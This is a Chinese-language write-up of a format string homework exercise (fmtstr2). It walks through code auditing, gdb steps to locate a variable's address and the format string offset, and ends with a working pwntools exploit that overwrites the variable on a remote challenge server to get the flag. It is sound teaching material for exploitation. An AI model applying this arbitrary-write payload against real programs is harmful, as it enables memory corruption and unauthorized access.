软件安全-课后练习-格式化字符串-fmtstr2-随笔

一、准备工作

题目-百度网盘

1.

2.代码审计

只要输入不是yes或者no，就会调用到存在格式化字符串漏洞的printf函数

如果authenticated 的值为1195526213（十六进制：0x47424845），就可以得到flag。

二、思路：

通过格式化字符串覆盖存储authenticated变量的地址对应的内容为1195526213（十六进制：0x47424845）

三、找到存储authenticated变量值的地址

gdb:

b read_flag
r
# 接下来要输入内容，可随便输入

关键的代码在划线的两行，eax+0x48的值即为存储authenticated变量值的地址

gdb：

ni
ni
ni
ni
ni
ni
ni
ni
p $eax + 0x48

得到存储authenticated变量值的地址：

四、获得格式化字符串的offset

不理解的话可以看这两篇：
最基础的格式化字符串的原理
通过一道例题

1.让程序执行到call printf

gdb:

b printf
r
# 接下来要输入内容，可随便输入

返回地址如划线处
gdb:

disas  0x8049560

d
 b *0x804955b
 r
 # 接下来输入内容，可输入一些比较有特征的数字，这里以AAAABBBBCCCCDDDD为例
 stack 20

2.确定offset

从第一处划线位置为1开始往下数，第二处划线为11，因此offset为11

五、构造payload

from pwn import *
# context.log_level = "DEBUG"
ifRemote = 1
if ifRemote:
    io = remote("8.134.59.72", 38728)
else:
    io = process("./fmtstr2")
authenticated_addr = 0x0804c048
authenticated_value = 0x47424845
offset = 11
# payload = b'%66c%22$hhn%3c%23$hhn%2c%24$hhn%1c%25$hhnaaaJ\xc0\x04\x08H\xc0\x04\x08K\xc0\x04\x08I\xc0\x04\x08'
payload=fmtstr_payload(offset,{authenticated_addr:authenticated_value})
print(payload)
io.sendline(payload)
io.interactive()